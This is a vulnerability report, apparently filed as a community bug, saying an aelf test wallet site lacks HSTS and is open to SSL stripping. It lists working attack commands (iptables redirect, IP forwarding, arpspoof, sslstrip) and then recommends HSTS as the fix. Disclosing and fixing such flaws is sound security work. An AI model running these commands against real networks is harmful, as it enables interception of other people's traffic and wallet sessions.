[Community Bug] + Wallet is Vulnerable to MiTM #53
Description
Vulnerability: Wallet is Vulnerable to MiTM Attack/SSLStrip Attack (Hacking HTTPS)
Description: It was observed that the wallet is vulnerable to a MiTM (Man in The Middle) Attack. This means an attacker can intercept the connection between a web browser and a trusted wallet by forcing the wallet to load without utilizing SSL/TLS.
Vulnerable Application: Wallet https://wallet-test.aelf.io
Severity: High
Steps to Reproduce:
1- Enter the below command in a Linux command prompt: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
2- Now use the below command to enable forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward
3- Now use arpspoofing for the target victim: arpspoof -i eth0 -t victim ip gateway ip
4- You should now see that arpsoof is running. Now in a separate terminal window type the following command: sslstrip -l 8080
5- When the victim tries to access wallet-test.aelf.io it will load over HTTP.
Or
check the HSTS Presence in the response header.
Impact: An attacker can force the wallet to utilize HTTP. Once the wallet is over HTTP then an attacker can sniff the communication.
Fix: The following are recommendations to protect against SSLStrip and similar attacks:
1- Enable HSTS
2- Enable HTTPS throughout the website
Screenshot: Shows wallet is NOW accessible over HTTP
Attack Reference: Reference link to understand more about this issue:
https://www.cybrary.it/0p3n/sslstrip-in-man-in-the-middle-attack/